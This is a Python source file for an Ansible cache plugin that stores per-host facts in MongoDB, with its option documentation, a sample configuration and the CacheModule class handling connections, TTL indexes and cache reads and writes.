Current File : /lib/python3/dist-packages/ansible_collections/community/mongodb/plugins/cache/mongodb.py
# (c) 2018, Matt Martz <matt@sivel.net>
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
from __future__ import (absolute_import, division, print_function)
__metaclass__ = type

ANSIBLE_METADATA = {'metadata_version': '1.1',
                    'status': ['preview'],
                    'supported_by': 'community'}

DOCUMENTATION = '''
name: mongodb
author:
  - Matt Martz (@sivel)
version_added: "1.0.0"
short_description: Use MongoDB for caching
description:
    - This cache uses per-host records saved in MongoDB.
requirements:
    - pymongo>=3
options:
    _uri:
        description:
        - MongoDB Connection String URI
        required: False
        env:
          - name: ANSIBLE_CACHE_PLUGIN_CONNECTION
        ini:
          - key: fact_caching_connection
            section: defaults
    _prefix:
        description: User defined prefix to use when creating the DB entries
        default: ansible_facts
        env:
          - name: ANSIBLE_CACHE_PLUGIN_PREFIX
        ini:
          - key: fact_caching_prefix
            section: defaults
    _timeout:
        default: 86400
        description: Expiration timeout in seconds for the cache plugin data. Set to 0 to never expire
        env:
          - name: ANSIBLE_CACHE_PLUGIN_TIMEOUT
        ini:
          - key: fact_caching_timeout
            section: defaults
        type: integer
'''
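# Example configuration (illustrative sketch only, not part of the plugin's docs):
# the option keys below come from the DOCUMENTATION block above, while the plugin
# name and the connection URI are assumptions for demonstration.
#
#   # ansible.cfg
#   [defaults]
#   fact_caching = community.mongodb.mongodb
#   fact_caching_connection = mongodb://localhost:27017/ansible
#   fact_caching_prefix = ansible_facts
#   fact_caching_timeout = 86400
#
# The same options can also be supplied via the environment variables documented
# above (ANSIBLE_CACHE_PLUGIN_CONNECTION, ANSIBLE_CACHE_PLUGIN_PREFIX,
# ANSIBLE_CACHE_PLUGIN_TIMEOUT).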

import datetime

from contextlib import contextmanager

from ansible import constants as C
from ansible.errors import AnsibleError
from ansible.plugins.cache import BaseCacheModule
from ansible.utils.display import Display
from ansible.module_utils._text import to_native

pymongo_missing = False

try:
    import pymongo
except ImportError:
    pymongo_missing = True

display = Display()


class CacheModule(BaseCacheModule):
    """
    A caching module backed by mongodb.
    """
    def __init__(self, *args, **kwargs):
        try:
            if pymongo_missing:
                raise AnsibleError("The 'pymongo' python module is required for the mongodb fact cache, 'pip install pymongo>=3.0'")
            super(CacheModule, self).__init__(*args, **kwargs)
            self._connection = self.get_option('_uri')
            self._timeout = int(self.get_option('_timeout'))
            self._prefix = self.get_option('_prefix')
        except KeyError:
            self._connection = C.CACHE_PLUGIN_CONNECTION
            self._timeout = int(C.CACHE_PLUGIN_TIMEOUT)
            self._prefix = C.CACHE_PLUGIN_PREFIX

        self._cache = {}
        self._managed_indexes = False

    def _ttl_index_exists(self, collection):
        '''
        Returns true if an index named ttl exists
        on the given collection.
        '''
        exists = False
        try:
            indexes = collection.list_indexes()
            for index in indexes:
                if index["name"] == "ttl":
                    exists = True
                    break
        except pymongo.errors.OperationFailure as excep:
            raise AnsibleError('Error checking MongoDB index: %s' % to_native(excep))
        return exists

    def _manage_indexes(self, collection):
        '''
        This function manages indexes on the mongo collection.
        We only do this once per run, tracked via _managed_indexes,
        rather than on every connection instantiation, as that would be overkill.
        '''
        _timeout = self._timeout
        if _timeout and _timeout > 0:
            try:
                collection.create_index(
                    'date',
                    name='ttl',
                    expireAfterSeconds=_timeout
                )
            except pymongo.errors.OperationFailure:
                # We get here when fact_caching_timeout was set to a different value between runs
                if self._ttl_index_exists(collection):
                    collection.drop_index('ttl')
                return self._manage_indexes(collection)
        else:
            if self._ttl_index_exists(collection):
                collection.drop_index('ttl')

    @contextmanager
    def _collection(self):
        '''
        This is a context manager for opening and closing mongo connections as needed. It exists so as not to create a global
        connection, because pymongo is not fork safe (http://api.mongodb.com/python/current/faq.html#is-pymongo-fork-safe)
        '''
        mongo = pymongo.MongoClient(self._connection)
        try:
            db = mongo.get_default_database()
        except pymongo.errors.ConfigurationError:
            # We'll fall back to using ``ansible`` as the database if one was not provided
            # in the MongoDB Connection String URI
            db = mongo['ansible']

        # The collection is hard-coded as ``cache``; there are no configuration options for this
        collection = db['cache']
        if not self._managed_indexes:
            # Only manage the indexes once per run, not per connection
            self._manage_indexes(collection)
            self._managed_indexes = True

        yield collection

        mongo.close()

    def _make_key(self, key):
        return '%s%s' % (self._prefix, key)

    def get(self, key):
        if key not in self._cache:
            with self._collection() as collection:
                value = collection.find_one({'_id': self._make_key(key)})
            if value is None:
                # No cached document for this key; raise KeyError on a miss rather
                # than failing with a TypeError when subscripting None below
                raise KeyError(key)
            self._cache[key] = value['data']

        return self._cache.get(key)

    def set(self, key, value):
        self._cache[key] = value
        with self._collection() as collection:
            collection.update_one(
                {'_id': self._make_key(key)},
                {
                    '$set': {
                        '_id': self._make_key(key),
                        'data': value,
                        'date': datetime.datetime.utcnow()
                    }
                },
                upsert=True
            )
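
    # Illustrative note (not an upstream comment): set() writes documents of the
    # shape {'_id': '<prefix><key>', 'data': <value>, 'date': <UTC datetime>}.
    # The TTL index created in _manage_indexes() lets MongoDB expire each document
    # once its 'date' field is older than the configured _timeout.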

    def keys(self):
        with self._collection() as collection:
            return [doc['_id'] for doc in collection.find({}, {'_id': True})]

    def contains(self, key):
        with self._collection() as collection:
            # count_documents() replaces the deprecated Collection.count(), which was removed in pymongo 4
            return bool(collection.count_documents({'_id': self._make_key(key)}))

    def delete(self, key):
        del self._cache[key]
        with self._collection() as collection:
            collection.delete_one({'_id': self._make_key(key)})

    def flush(self):
        with self._collection() as collection:
            collection.delete_many({})

    def copy(self):
        with self._collection() as collection:
            return dict((d['_id'], d['data']) for d in collection.find({}))

    def __getstate__(self):
        return dict()

    def __setstate__(self, data):
        self.__init__()
